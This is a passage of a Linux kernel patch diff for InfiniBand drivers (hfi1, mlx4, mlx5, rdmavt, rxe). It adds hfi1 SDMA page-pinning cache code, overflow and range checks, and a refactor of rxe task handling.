++	WARN_ON(atomic_read(&node->refcount) < 0);
++}
++
++static inline void release_node(struct mmu_rb_handler *handler,
++				struct sdma_mmu_node *node)
++{
++	atomic_dec(&node->refcount);
++	WARN_ON(atomic_read(&node->refcount) < 0);
++}
++
++static struct sdma_mmu_node *find_system_node(struct mmu_rb_handler *handler,
++					      unsigned long start,
++					      unsigned long end)
++{
++	struct mmu_rb_node *rb_node;
++	struct sdma_mmu_node *node;
++	unsigned long flags;
++
++	spin_lock_irqsave(&handler->lock, flags);
++	rb_node = hfi1_mmu_rb_get_first(handler, start, (end - start));
++	if (!rb_node) {
++		spin_unlock_irqrestore(&handler->lock, flags);
++		return NULL;
++	}
++	node = container_of(rb_node, struct sdma_mmu_node, rb);
++	acquire_node(node);
++	spin_unlock_irqrestore(&handler->lock, flags);
++
++	return node;
++}
++
++static int pin_system_pages(struct user_sdma_request *req,
++			    uintptr_t start_address, size_t length,
++			    struct sdma_mmu_node *node, int npages)
++{
++	struct hfi1_user_sdma_pkt_q *pq = req->pq;
++	int pinned, cleared;
++	struct page **pages;
++
++	pages = kcalloc(npages, sizeof(*pages), GFP_KERNEL);
++	if (!pages)
++		return -ENOMEM;
++
++retry:
++	if (!hfi1_can_pin_pages(pq->dd, current->mm, atomic_read(&pq->n_locked),
++				npages)) {
++		SDMA_DBG(req, "Evicting: nlocked %u npages %u",
++			 atomic_read(&pq->n_locked), npages);
++		cleared = sdma_cache_evict(pq, npages);
++		if (cleared >= npages)
++			goto retry;
++	}
++
++	SDMA_DBG(req, "Acquire user pages start_address %lx node->npages %u npages %u",
++		 start_address, node->npages, npages);
++	pinned = hfi1_acquire_user_pages(current->mm, start_address, npages, 0,
++					 pages);
++
++	if (pinned < 0) {
++		kfree(pages);
++		SDMA_DBG(req, "pinned %d", pinned);
++		return pinned;
++	}
++	if (pinned != npages) {
++		unpin_vector_pages(current->mm, pages, node->npages, pinned);
++		SDMA_DBG(req, "npages %u pinned %d", npages, pinned);
++		return -EFAULT;
++	}
++	node->rb.addr = start_address;
++	node->rb.len = length;
++	node->pages = pages;
++	node->npages = npages;
++	atomic_add(pinned, &pq->n_locked);
++	SDMA_DBG(req, "done. pinned %d", pinned);
++	return 0;
++}
++
++static int add_system_pinning(struct user_sdma_request *req,
++			      struct sdma_mmu_node **node_p,
++			      unsigned long start, unsigned long len)
++
++{
++	struct hfi1_user_sdma_pkt_q *pq = req->pq;
++	struct sdma_mmu_node *node;
++	int ret;
++
++	node = kzalloc(sizeof(*node), GFP_KERNEL);
++	if (!node)
++		return -ENOMEM;
++
++	node->pq = pq;
++	ret = pin_system_pages(req, start, len, node, PFN_DOWN(len));
++	if (ret == 0) {
++		ret = hfi1_mmu_rb_insert(pq->handler, &node->rb);
++		if (ret)
++			free_system_node(node);
++		else
++			*node_p = node;
++
++		return ret;
++	}
++
++	kfree(node);
++	return ret;
++}
++
++static int get_system_cache_entry(struct user_sdma_request *req,
++				  struct sdma_mmu_node **node_p,
++				  size_t req_start, size_t req_len)
++{
++	struct hfi1_user_sdma_pkt_q *pq = req->pq;
++	u64 start = ALIGN_DOWN(req_start, PAGE_SIZE);
++	u64 end = PFN_ALIGN(req_start + req_len);
++	struct mmu_rb_handler *handler = pq->handler;
++	int ret;
++
++	if ((end - start) == 0) {
++		SDMA_DBG(req,
++			 "Request for empty cache entry req_start %lx req_len %lx start %llx end %llx",
++			 req_start, req_len, start, end);
++		return -EINVAL;
++	}
++
++	SDMA_DBG(req, "req_start %lx req_len %lu", req_start, req_len);
++
++	while (1) {
++		struct sdma_mmu_node *node =
++			find_system_node(handler, start, end);
++		u64 prepend_len = 0;
++
++		SDMA_DBG(req, "node %p start %llx end %llu", node, start, end);
++		if (!node) {
++			ret = add_system_pinning(req, node_p, start,
++						 end - start);
++			if (ret == -EEXIST) {
++				/*
++				 * Another execution context has inserted a
++				 * conficting entry first.
++				 */
++				continue;
++			}
++			return ret;
++		}
++
++		if (node->rb.addr <= start) {
++			/*
++			 * This entry covers at least part of the region. If it doesn't extend
++			 * to the end, then this will be called again for the next segment.
++			 */
++			*node_p = node;
++			return 0;
++		}
++
++		SDMA_DBG(req, "prepend: node->rb.addr %lx, node->refcount %d",
++			 node->rb.addr, atomic_read(&node->refcount));
++		prepend_len = node->rb.addr - start;
++
++		/*
++		 * This node will not be returned, instead a new node
++		 * will be. So release the reference.
++		 */
++		release_node(handler, node);
++
++		/* Prepend a node to cover the beginning of the allocation */
++		ret = add_system_pinning(req, node_p, start, prepend_len);
++		if (ret == -EEXIST) {
++			/* Another execution context has inserted a conficting entry first. */
++			continue;
++		}
++		return ret;
++	}
++}
++
++static int add_mapping_to_sdma_packet(struct user_sdma_request *req,
++				      struct user_sdma_txreq *tx,
++				      struct sdma_mmu_node *cache_entry,
++				      size_t start,
++				      size_t from_this_cache_entry)
++{
++	struct hfi1_user_sdma_pkt_q *pq = req->pq;
++	unsigned int page_offset;
++	unsigned int from_this_page;
++	size_t page_index;
++	void *ctx;
++	int ret;
++
++	/*
++	 * Because the cache may be more fragmented than the memory that is being accessed,
++	 * it's not strictly necessary to have a descriptor per cache entry.
++	 */
++
++	while (from_this_cache_entry) {
++		page_index = PFN_DOWN(start - cache_entry->rb.addr);
++
++		if (page_index >= cache_entry->npages) {
++			SDMA_DBG(req,
++				 "Request for page_index %zu >= cache_entry->npages %u",
++				 page_index, cache_entry->npages);
++			return -EINVAL;
++		}
++
++		page_offset = start - ALIGN_DOWN(start, PAGE_SIZE);
++		from_this_page = PAGE_SIZE - page_offset;
++
++		if (from_this_page < from_this_cache_entry) {
++			ctx = NULL;
++		} else {
++			/*
++			 * In the case they are equal the next line has no practical effect,
++			 * but it's better to do a register to register copy than a conditional
++			 * branch.
++			 */
++			from_this_page = from_this_cache_entry;
++			ctx = cache_entry;
++		}
++
++		ret = sdma_txadd_page(pq->dd, ctx, &tx->txreq,
++				      cache_entry->pages[page_index],
++				      page_offset, from_this_page);
++		if (ret) {
++			/*
++			 * When there's a failure, the entire request is freed by
++			 * user_sdma_send_pkts().
++			 */
++			SDMA_DBG(req,
++				 "sdma_txadd_page failed %d page_index %lu page_offset %u from_this_page %u",
++				 ret, page_index, page_offset, from_this_page);
++			return ret;
++		}
++		start += from_this_page;
++		from_this_cache_entry -= from_this_page;
++	}
++	return 0;
++}
++
++static int add_system_iovec_to_sdma_packet(struct user_sdma_request *req,
++					   struct user_sdma_txreq *tx,
++					   struct user_sdma_iovec *iovec,
++					   size_t from_this_iovec)
++{
++	struct mmu_rb_handler *handler = req->pq->handler;
++
++	while (from_this_iovec > 0) {
++		struct sdma_mmu_node *cache_entry;
++		size_t from_this_cache_entry;
++		size_t start;
++		int ret;
++
++		start = (uintptr_t)iovec->iov.iov_base + iovec->offset;
++		ret = get_system_cache_entry(req, &cache_entry, start,
++					     from_this_iovec);
++		if (ret) {
++			SDMA_DBG(req, "pin system segment failed %d", ret);
++			return ret;
++		}
++
++		from_this_cache_entry = cache_entry->rb.len - (start - cache_entry->rb.addr);
++		if (from_this_cache_entry > from_this_iovec)
++			from_this_cache_entry = from_this_iovec;
++
++		ret = add_mapping_to_sdma_packet(req, tx, cache_entry, start,
++						 from_this_cache_entry);
++		if (ret) {
++			/*
++			 * We're guaranteed that there will be no descriptor
++			 * completion callback that releases this node
++			 * because only the last descriptor referencing it
++			 * has a context attached, and a failure means the
++			 * last descriptor was never added.
++			 */
++			release_node(handler, cache_entry);
++			SDMA_DBG(req, "add system segment failed %d", ret);
++			return ret;
++		}
++
++		iovec->offset += from_this_cache_entry;
++		from_this_iovec -= from_this_cache_entry;
++	}
++
++	return 0;
++}
++
++static int add_system_pages_to_sdma_packet(struct user_sdma_request *req,
++					   struct user_sdma_txreq *tx,
++					   struct user_sdma_iovec *iovec,
++					   u32 *pkt_data_remaining)
++{
++	size_t remaining_to_add = *pkt_data_remaining;
++	/*
++	 * Walk through iovec entries, ensure the associated pages
++	 * are pinned and mapped, add data to the packet until no more
++	 * data remains to be added.
++	 */
++	while (remaining_to_add > 0) {
++		struct user_sdma_iovec *cur_iovec;
++		size_t from_this_iovec;
++		int ret;
++
++		cur_iovec = iovec;
++		from_this_iovec = iovec->iov.iov_len - iovec->offset;
++
++		if (from_this_iovec > remaining_to_add) {
++			from_this_iovec = remaining_to_add;
++		} else {
++			/* The current iovec entry will be consumed by this pass. */
++			req->iov_idx++;
++			iovec++;
++		}
++
++		ret = add_system_iovec_to_sdma_packet(req, tx, cur_iovec,
++						      from_this_iovec);
++		if (ret)
++			return ret;
++
++		remaining_to_add -= from_this_iovec;
++	}
++	*pkt_data_remaining = remaining_to_add;
++
++	return 0;
++}
++
++void system_descriptor_complete(struct hfi1_devdata *dd,
++				struct sdma_desc *descp)
++{
++	switch (sdma_mapping_type(descp)) {
++	case SDMA_MAP_SINGLE:
++		dma_unmap_single(&dd->pcidev->dev, sdma_mapping_addr(descp),
++				 sdma_mapping_len(descp), DMA_TO_DEVICE);
++		break;
++	case SDMA_MAP_PAGE:
++		dma_unmap_page(&dd->pcidev->dev, sdma_mapping_addr(descp),
++			       sdma_mapping_len(descp), DMA_TO_DEVICE);
++		break;
++	}
++
++	if (descp->pinning_ctx) {
++		struct sdma_mmu_node *node = descp->pinning_ctx;
++
++		release_node(node->rb.handler, node);
++	}
++}
++
+ static bool sdma_rb_filter(struct mmu_rb_node *node, unsigned long addr,
+ 			   unsigned long len)
+ {
+@@ -1493,8 +1666,7 @@ static void sdma_rb_remove(void *arg, struct mmu_rb_node *mnode)
+ 	struct sdma_mmu_node *node =
+ 		container_of(mnode, struct sdma_mmu_node, rb);
+ 
+-	unpin_sdma_pages(node);
+-	kfree(node);
++	free_system_node(node);
+ }
+ 
+ static int sdma_rb_invalidate(void *arg, struct mmu_rb_node *mnode)
+diff --git a/drivers/infiniband/hw/hfi1/user_sdma.h b/drivers/infiniband/hw/hfi1/user_sdma.h
+index ea56eb57e6568..a241836371dc1 100644
+--- a/drivers/infiniband/hw/hfi1/user_sdma.h
++++ b/drivers/infiniband/hw/hfi1/user_sdma.h
+@@ -112,16 +112,11 @@ struct sdma_mmu_node {
+ struct user_sdma_iovec {
+ 	struct list_head list;
+ 	struct iovec iov;
+-	/* number of pages in this vector */
+-	unsigned int npages;
+-	/* array of pinned pages for this vector */
+-	struct page **pages;
+ 	/*
+ 	 * offset into the virtual address space of the vector at
+ 	 * which we last left off.
+ 	 */
+ 	u64 offset;
+-	struct sdma_mmu_node *node;
+ };
+ 
+ /* evict operation argument */
+diff --git a/drivers/infiniband/hw/hfi1/verbs.c b/drivers/infiniband/hw/hfi1/verbs.c
+index e6e17984553c0..39ca32d9ae6a5 100644
+--- a/drivers/infiniband/hw/hfi1/verbs.c
++++ b/drivers/infiniband/hw/hfi1/verbs.c
+@@ -778,8 +778,8 @@ static int build_verbs_tx_desc(
+ 
+ 	/* add icrc, lt byte, and padding to flit */
+ 	if (extra_bytes)
+-		ret = sdma_txadd_daddr(sde->dd, &tx->txreq,
+-				       sde->dd->sdma_pad_phys, extra_bytes);
++		ret = sdma_txadd_daddr(sde->dd, &tx->txreq, sde->dd->sdma_pad_phys,
++				       extra_bytes);
+ 
+ bail_txadd:
+ 	return ret;
+diff --git a/drivers/infiniband/hw/hfi1/vnic_sdma.c b/drivers/infiniband/hw/hfi1/vnic_sdma.c
+index c3f0f8d877c37..727eedfba332a 100644
+--- a/drivers/infiniband/hw/hfi1/vnic_sdma.c
++++ b/drivers/infiniband/hw/hfi1/vnic_sdma.c
+@@ -64,6 +64,7 @@ static noinline int build_vnic_ulp_payload(struct sdma_engine *sde,
+ 
+ 		/* combine physically continuous fragments later? */
+ 		ret = sdma_txadd_page(sde->dd,
++				      NULL,
+ 				      &tx->txreq,
+ 				      skb_frag_page(frag),
+ 				      skb_frag_off(frag),
+diff --git a/drivers/infiniband/hw/mlx4/qp.c b/drivers/infiniband/hw/mlx4/qp.c
+index b17d6ebc5b705..488c906c0432c 100644
+--- a/drivers/infiniband/hw/mlx4/qp.c
++++ b/drivers/infiniband/hw/mlx4/qp.c
+@@ -412,9 +412,13 @@ static int set_user_sq_size(struct mlx4_ib_dev *dev,
+ 			    struct mlx4_ib_qp *qp,
+ 			    struct mlx4_ib_create_qp *ucmd)
+ {
++	u32 cnt;
++
+ 	/* Sanity check SQ size before proceeding */
+-	if ((1 << ucmd->log_sq_bb_count) > dev->dev->caps.max_wqes	 ||
+-	    ucmd->log_sq_stride >
++	if (check_shl_overflow(1, ucmd->log_sq_bb_count, &cnt) ||
++	    cnt > dev->dev->caps.max_wqes)
++		return -EINVAL;
++	if (ucmd->log_sq_stride >
+ 		ilog2(roundup_pow_of_two(dev->dev->caps.max_sq_desc_sz)) ||
+ 	    ucmd->log_sq_stride < MLX4_IB_MIN_SQ_STRIDE)
+ 		return -EINVAL;
+diff --git a/drivers/infiniband/hw/mlx5/devx.c b/drivers/infiniband/hw/mlx5/devx.c
+index 2211a0be16f36..f8e2baed27a5c 100644
+--- a/drivers/infiniband/hw/mlx5/devx.c
++++ b/drivers/infiniband/hw/mlx5/devx.c
+@@ -666,7 +666,21 @@ static bool devx_is_valid_obj_id(struct uverbs_attr_bundle *attrs,
+ 				      obj_id;
+ 
+ 	case MLX5_IB_OBJECT_DEVX_OBJ:
+-		return ((struct devx_obj *)uobj->object)->obj_id == obj_id;
++	{
++		u16 opcode = MLX5_GET(general_obj_in_cmd_hdr, in, opcode);
++		struct devx_obj *devx_uobj = uobj->object;
++
++		if (opcode == MLX5_CMD_OP_QUERY_FLOW_COUNTER &&
++		    devx_uobj->flow_counter_bulk_size) {
++			u64 end;
++
++			end = devx_uobj->obj_id +
++				devx_uobj->flow_counter_bulk_size;
++			return devx_uobj->obj_id <= obj_id && end > obj_id;
++		}
++
++		return devx_uobj->obj_id == obj_id;
++	}
+ 
+ 	default:
+ 		return false;
+@@ -1517,10 +1531,17 @@ static int UVERBS_HANDLER(MLX5_IB_METHOD_DEVX_OBJ_CREATE)(
+ 		goto obj_free;
+ 
+ 	if (opcode == MLX5_CMD_OP_ALLOC_FLOW_COUNTER) {
+-		u8 bulk = MLX5_GET(alloc_flow_counter_in,
+-				   cmd_in,
+-				   flow_counter_bulk);
+-		obj->flow_counter_bulk_size = 128UL * bulk;
++		u32 bulk = MLX5_GET(alloc_flow_counter_in,
++				    cmd_in,
++				    flow_counter_bulk_log_size);
++
++		if (bulk)
++			bulk = 1 << bulk;
++		else
++			bulk = 128UL * MLX5_GET(alloc_flow_counter_in,
++						cmd_in,
++						flow_counter_bulk);
++		obj->flow_counter_bulk_size = bulk;
+ 	}
+ 
+ 	uobj->object = obj;
+diff --git a/drivers/infiniband/hw/mlx5/qp.c b/drivers/infiniband/hw/mlx5/qp.c
+index cf953d23d18da..f7d3643b08f50 100644
+--- a/drivers/infiniband/hw/mlx5/qp.c
++++ b/drivers/infiniband/hw/mlx5/qp.c
+@@ -4408,7 +4408,7 @@ static int mlx5_ib_modify_dct(struct ib_qp *ibqp, struct ib_qp_attr *attr,
+ 			return -EINVAL;
+ 
+ 		if (attr->port_num == 0 ||
+-		    attr->port_num > MLX5_CAP_GEN(dev->mdev, num_ports)) {
++		    attr->port_num > dev->num_ports) {
+ 			mlx5_ib_dbg(dev, "invalid port number %d. number of ports is %d\n",
+ 				    attr->port_num, dev->num_ports);
+ 			return -EINVAL;
+diff --git a/drivers/infiniband/hw/mlx5/umr.c b/drivers/infiniband/hw/mlx5/umr.c
+index 029e9536ec28f..8b674514818a1 100644
+--- a/drivers/infiniband/hw/mlx5/umr.c
++++ b/drivers/infiniband/hw/mlx5/umr.c
+@@ -380,6 +380,9 @@ static void mlx5r_umr_set_access_flags(struct mlx5_ib_dev *dev,
+ 				       struct mlx5_mkey_seg *seg,
+ 				       unsigned int access_flags)
+ {
++	bool ro_read = (access_flags & IB_ACCESS_RELAXED_ORDERING) &&
++		       pcie_relaxed_ordering_enabled(dev->mdev->pdev);
++
+ 	MLX5_SET(mkc, seg, a, !!(access_flags & IB_ACCESS_REMOTE_ATOMIC));
+ 	MLX5_SET(mkc, seg, rw, !!(access_flags & IB_ACCESS_REMOTE_WRITE));
+ 	MLX5_SET(mkc, seg, rr, !!(access_flags & IB_ACCESS_REMOTE_READ));
+@@ -387,8 +390,7 @@ static void mlx5r_umr_set_access_flags(struct mlx5_ib_dev *dev,
+ 	MLX5_SET(mkc, seg, lr, 1);
+ 	MLX5_SET(mkc, seg, relaxed_ordering_write,
+ 		 !!(access_flags & IB_ACCESS_RELAXED_ORDERING));
+-	MLX5_SET(mkc, seg, relaxed_ordering_read,
+-		 !!(access_flags & IB_ACCESS_RELAXED_ORDERING));
++	MLX5_SET(mkc, seg, relaxed_ordering_read, ro_read);
+ }
+ 
+ int mlx5r_umr_rereg_pd_access(struct mlx5_ib_mr *mr, struct ib_pd *pd,
+diff --git a/drivers/infiniband/sw/rdmavt/qp.c b/drivers/infiniband/sw/rdmavt/qp.c
+index 3acab569fbb94..2bdc4486c3daa 100644
+--- a/drivers/infiniband/sw/rdmavt/qp.c
++++ b/drivers/infiniband/sw/rdmavt/qp.c
+@@ -464,8 +464,6 @@ void rvt_qp_exit(struct rvt_dev_info *rdi)
+ 	if (qps_inuse)
+ 		rvt_pr_err(rdi, "QP memory leak! %u still in use\n",
+ 			   qps_inuse);
+-	if (!rdi->qp_dev)
+-		return;
+ 
+ 	kfree(rdi->qp_dev->qp_table);
+ 	free_qpn_table(&rdi->qp_dev->qpn_table);
+diff --git a/drivers/infiniband/sw/rxe/rxe.c b/drivers/infiniband/sw/rxe/rxe.c
+index 136c2efe34660..a3f05fdd9fac2 100644
+--- a/drivers/infiniband/sw/rxe/rxe.c
++++ b/drivers/infiniband/sw/rxe/rxe.c
+@@ -175,7 +175,7 @@ int rxe_add(struct rxe_dev *rxe, unsigned int mtu, const char *ibdev_name)
+ 
+ static int rxe_newlink(const char *ibdev_name, struct net_device *ndev)
+ {
+-	struct rxe_dev *exists;
++	struct rxe_dev *rxe;
+ 	int err = 0;
+ 
+ 	if (is_vlan_dev(ndev)) {
+@@ -184,17 +184,17 @@ static int rxe_newlink(const char *ibdev_name, struct net_device *ndev)
+ 		goto err;
+ 	}
+ 
+-	exists = rxe_get_dev_from_net(ndev);
+-	if (exists) {
+-		ib_device_put(&exists->ib_dev);
+-		rxe_dbg(exists, "already configured on %s\n", ndev->name);
++	rxe = rxe_get_dev_from_net(ndev);
++	if (rxe) {
++		ib_device_put(&rxe->ib_dev);
++		rxe_dbg(rxe, "already configured on %s\n", ndev->name);
+ 		err = -EEXIST;
+ 		goto err;
+ 	}
+ 
+ 	err = rxe_net_add(ibdev_name, ndev);
+ 	if (err) {
+-		rxe_dbg(exists, "failed to add %s\n", ndev->name);
++		pr_debug("failed to add %s\n", ndev->name);
+ 		goto err;
+ 	}
+ err:
+diff --git a/drivers/infiniband/sw/rxe/rxe_comp.c b/drivers/infiniband/sw/rxe/rxe_comp.c
+index 20737fec392bf..9a9d3ec2bf2fd 100644
+--- a/drivers/infiniband/sw/rxe/rxe_comp.c
++++ b/drivers/infiniband/sw/rxe/rxe_comp.c
+@@ -571,9 +571,8 @@ static void free_pkt(struct rxe_pkt_info *pkt)
+ 	ib_device_put(dev);
+ }
+ 
+-int rxe_completer(void *arg)
++int rxe_completer(struct rxe_qp *qp)
+ {
+-	struct rxe_qp *qp = (struct rxe_qp *)arg;
+ 	struct rxe_dev *rxe = to_rdev(qp->ibqp.device);
+ 	struct rxe_send_wqe *wqe = NULL;
+ 	struct sk_buff *skb = NULL;
+diff --git a/drivers/infiniband/sw/rxe/rxe_cq.c b/drivers/infiniband/sw/rxe/rxe_cq.c
+index 1df186534639a..faf49c50bbaba 100644
+--- a/drivers/infiniband/sw/rxe/rxe_cq.c
++++ b/drivers/infiniband/sw/rxe/rxe_cq.c
+@@ -39,21 +39,6 @@ err1:
+ 	return -EINVAL;
+ }
+ 
+-static void rxe_send_complete(struct tasklet_struct *t)
+-{
+-	struct rxe_cq *cq = from_tasklet(cq, t, comp_task);
+-	unsigned long flags;
+-
+-	spin_lock_irqsave(&cq->cq_lock, flags);
+-	if (cq->is_dying) {
+-		spin_unlock_irqrestore(&cq->cq_lock, flags);
+-		return;
+-	}
+-	spin_unlock_irqrestore(&cq->cq_lock, flags);
+-
+-	cq->ibcq.comp_handler(&cq->ibcq, cq->ibcq.cq_context);
+-}
+-
+ int rxe_cq_from_init(struct rxe_dev *rxe, struct rxe_cq *cq, int cqe,
+ 		     int comp_vector, struct ib_udata *udata,
+ 		     struct rxe_create_cq_resp __user *uresp)
+@@ -79,10 +64,6 @@ int rxe_cq_from_init(struct rxe_dev *rxe, struct rxe_cq *cq, int cqe,
+ 
+ 	cq->is_user = uresp;
+ 
+-	cq->is_dying = false;
+-
+-	tasklet_setup(&cq->comp_task, rxe_send_complete);
+-
+ 	spin_lock_init(&cq->cq_lock);
+ 	cq->ibcq.cqe = cqe;
+ 	return 0;
+@@ -103,6 +84,7 @@ int rxe_cq_resize_queue(struct rxe_cq *cq, int cqe,
+ 	return err;
+ }
+ 
++/* caller holds reference to cq */
+ int rxe_cq_post(struct rxe_cq *cq, struct rxe_cqe *cqe, int solicited)
+ {
+ 	struct ib_event ev;
+@@ -135,21 +117,13 @@ int rxe_cq_post(struct rxe_cq *cq, struct rxe_cqe *cqe, int solicited)
+ 	if ((cq->notify == IB_CQ_NEXT_COMP) ||
+ 	    (cq->notify == IB_CQ_SOLICITED && solicited)) {
+ 		cq->notify = 0;
+-		tasklet_schedule(&cq->comp_task);
++
++		cq->ibcq.comp_handler(&cq->ibcq, cq->ibcq.cq_context);
+ 	}
+ 
+ 	return 0;
+ }
+ 
+-void rxe_cq_disable(struct rxe_cq *cq)
+-{
+-	unsigned long flags;
+-
+-	spin_lock_irqsave(&cq->cq_lock, flags);
+-	cq->is_dying = true;
+-	spin_unlock_irqrestore(&cq->cq_lock, flags);
+-}
+-
+ void rxe_cq_cleanup(struct rxe_pool_elem *elem)
+ {
+ 	struct rxe_cq *cq = container_of(elem, typeof(*cq), elem);
+diff --git a/drivers/infiniband/sw/rxe/rxe_loc.h b/drivers/infiniband/sw/rxe/rxe_loc.h
+index 1bb0cb479eb12..d131aaa94d059 100644
+--- a/drivers/infiniband/sw/rxe/rxe_loc.h
++++ b/drivers/infiniband/sw/rxe/rxe_loc.h
+@@ -171,9 +171,9 @@ void rxe_srq_cleanup(struct rxe_pool_elem *elem);
+ 
+ void rxe_dealloc(struct ib_device *ib_dev);
+ 
+-int rxe_completer(void *arg);
+-int rxe_requester(void *arg);
+-int rxe_responder(void *arg);
++int rxe_completer(struct rxe_qp *qp);
++int rxe_requester(struct rxe_qp *qp);
++int rxe_responder(struct rxe_qp *qp);
+ 
+ /* rxe_icrc.c */
+ int rxe_icrc_init(struct rxe_dev *rxe);
+diff --git a/drivers/infiniband/sw/rxe/rxe_qp.c b/drivers/infiniband/sw/rxe/rxe_qp.c
+index ab72db68b58f6..13283ec06f95e 100644
+--- a/drivers/infiniband/sw/rxe/rxe_qp.c
++++ b/drivers/infiniband/sw/rxe/rxe_qp.c
+@@ -473,29 +473,23 @@ static void rxe_qp_reset(struct rxe_qp *qp)
+ {
+ 	/* stop tasks from running */
+ 	rxe_disable_task(&qp->resp.task);
+-
+-	/* stop request/comp */
+-	if (qp->sq.queue) {
+-		if (qp_type(qp) == IB_QPT_RC)
+-			rxe_disable_task(&qp->comp.task);
+-		rxe_disable_task(&qp->req.task);
+-	}
++	rxe_disable_task(&qp->comp.task);
++	rxe_disable_task(&qp->req.task);
+ 
+ 	/* move qp to the reset state */
+ 	qp->req.state = QP_STATE_RESET;
+ 	qp->comp.state = QP_STATE_RESET;
+ 	qp->resp.state = QP_STATE_RESET;
+ 
+-	/* let state machines reset themselves drain work and packet queues
+-	 * etc.
+-	 */
+-	__rxe_do_task(&qp->resp.task);
++	/* drain work and packet queuesc */
++	rxe_requester(qp);
++	rxe_completer(qp);
++	rxe_responder(qp);
+ 
+-	if (qp->sq.queue) {
+-		__rxe_do_task(&qp->comp.task);
+-		__rxe_do_task(&qp->req.task);
++	if (qp->rq.queue)
++		rxe_queue_reset(qp->rq.queue);
++	if (qp->sq.queue)
+ 		rxe_queue_reset(qp->sq.queue);
+-	}
+ 
+ 	/* cleanup attributes */
+ 	atomic_set(&qp->ssn, 0);
+@@ -518,13 +512,8 @@ static void rxe_qp_reset(struct rxe_qp *qp)
+ 
+ 	/* reenable tasks */
+ 	rxe_enable_task(&qp->resp.task);
+-
+-	if (qp->sq.queue) {
+-		if (qp_type(qp) == IB_QPT_RC)
+-			rxe_enable_task(&qp->comp.task);
+-
+-		rxe_enable_task(&qp->req.task);
+-	}
++	rxe_enable_task(&qp->comp.task);
++	rxe_enable_task(&qp->req.task);
+ }
+ 
+ /* drain the send queue */
+@@ -533,10 +522,7 @@ static void rxe_qp_drain(struct rxe_qp *qp)
+ 	if (qp->sq.queue) {
+ 		if (qp->req.state != QP_STATE_DRAINED) {
+ 			qp->req.state = QP_STATE_DRAIN;
+-			if (qp_type(qp) == IB_QPT_RC)
+-				rxe_sched_task(&qp->comp.task);
+-			else
+-				__rxe_do_task(&qp->comp.task);
++			rxe_sched_task(&qp->comp.task);
+ 			rxe_sched_task(&qp->req.task);
+ 		}
+ 	}
+@@ -552,11 +538,7 @@ void rxe_qp_error(struct rxe_qp *qp)
+ 
+ 	/* drain work and packet queues */
+ 	rxe_sched_task(&qp->resp.task);
+-
+-	if (qp_type(qp) == IB_QPT_RC)
+-		rxe_sched_task(&qp->comp.task);
+-	else
+-		__rxe_do_task(&qp->comp.task);
++	rxe_sched_task(&qp->comp.task);
+ 	rxe_sched_task(&qp->req.task);
+ }
+ 
+@@ -773,24 +755,25 @@ static void rxe_qp_do_cleanup(struct work_struct *work)
+ 
+ 	qp->valid = 0;
+ 	qp->qp_timeout_jiffies = 0;
+-	rxe_cleanup_task(&qp->resp.task);
+ 
+ 	if (qp_type(qp) == IB_QPT_RC) {
+ 		del_timer_sync(&qp->retrans_timer);
+ 		del_timer_sync(&qp->rnr_nak_timer);
+ 	}
+ 
+-	rxe_cleanup_task(&qp->req.task);
+-	rxe_cleanup_task(&qp->comp.task);
++	if (qp->resp.task.func)
++		rxe_cleanup_task(&qp->resp.task);
+ 
+-	/* flush out any receive wr's or pending requests */
+ 	if (qp->req.task.func)
+-		__rxe_do_task(&qp->req.task);
++		rxe_cleanup_task(&qp->req.task);
+ 
+-	if (qp->sq.queue) {
+-		__rxe_do_task(&qp->comp.task);
+-		__rxe_do_task(&qp->req.task);
+-	}
++	if (qp->comp.task.func)
++		rxe_cleanup_task(&qp->comp.task);
++
++	/* flush out any receive wr's or pending requests */
++	rxe_requester(qp);
++	rxe_completer(qp);
++	rxe_responder(qp);
+ 
+ 	if (qp->sq.queue)
+ 		rxe_queue_cleanup(qp->sq.queue);
+diff --git a/drivers/infiniband/sw/rxe/rxe_req.c b/drivers/infiniband/sw/rxe/rxe_req.c
+index 899c8779f8001..f2dc2d191e16f 100644
+--- a/drivers/infiniband/sw/rxe/rxe_req.c
++++ b/drivers/infiniband/sw/rxe/rxe_req.c
+@@ -635,9 +635,8 @@ static int rxe_do_local_ops(struct rxe_qp *qp, struct rxe_send_wqe *wqe)
+ 	return 0;
+ }
+ 
+-int rxe_requester(void *arg)
++int rxe_requester(struct rxe_qp *qp)
+ {
+-	struct rxe_qp *qp = (struct rxe_qp *)arg;
+ 	struct rxe_dev *rxe = to_rdev(qp->ibqp.device);
+ 	struct rxe_pkt_info pkt;
+ 	struct sk_buff *skb;
+diff --git a/drivers/infiniband/sw/rxe/rxe_resp.c b/drivers/infiniband/sw/rxe/rxe_resp.c
+index 0cc1ba91d48cc..8c68340502769 100644
+--- a/drivers/infiniband/sw/rxe/rxe_resp.c
++++ b/drivers/infiniband/sw/rxe/rxe_resp.c
+@@ -1439,9 +1439,8 @@ static void rxe_drain_req_pkts(struct rxe_qp *qp, bool notify)
+ 		queue_advance_consumer(q, q->type);
+ }
+ 
+-int rxe_responder(void *arg)
++int rxe_responder(struct rxe_qp *qp)
+ {
+-	struct rxe_qp *qp = (struct rxe_qp *)arg;
+ 	struct rxe_dev *rxe = to_rdev(qp->ibqp.device);
+ 	enum resp_states state;
+ 	struct rxe_pkt_info *pkt = NULL;
+diff --git a/drivers/infiniband/sw/rxe/rxe_task.c b/drivers/infiniband/sw/rxe/rxe_task.c
+index 60b90e33a8849..a67f485454436 100644
+--- a/drivers/infiniband/sw/rxe/rxe_task.c
++++ b/drivers/infiniband/sw/rxe/rxe_task.c
+@@ -6,19 +6,6 @@
+ 
+ #include "rxe.h"
+ 
+-int __rxe_do_task(struct rxe_task *task)
+-
+-{
+-	int ret;
+-
+-	while ((ret = task->func(task->arg)) == 0)
+-		;
+-
+-	task->ret = ret;
+-
+-	return ret;
+-}
+-
+ /*
+  * this locking is due to a potential race where
+  * a second caller finds the task already running
+@@ -29,7 +16,7 @@ static void do_task(struct tasklet_struct *t)
+ 	int cont;
+ 	int ret;
+ 	struct rxe_task *task = from_tasklet(task, t, tasklet);
+-	struct rxe_qp *qp = (struct rxe_qp *)task->arg;
++	struct rxe_qp *qp = (struct rxe_qp *)task->qp;
+ 	unsigned int iterations = RXE_MAX_ITERATIONS;
+ 
+ 	spin_lock_bh(&task->lock);
+@@ -54,7 +41,7 @@ static void do_task(struct tasklet_struct *t)
+ 
+ 	do {
+ 		cont = 0;
+-		ret = task->func(task->arg);
++		ret = task->func(task->qp);
+ 
+ 		spin_lock_bh(&task->lock);
+ 		switch (task->state) {
+@@ -91,9 +78,10 @@ static void do_task(struct tasklet_struct *t)
+ 	task->ret = ret;
+ }
+ 
+-int rxe_init_task(struct rxe_task *task, void *arg, int (*func)(void *))
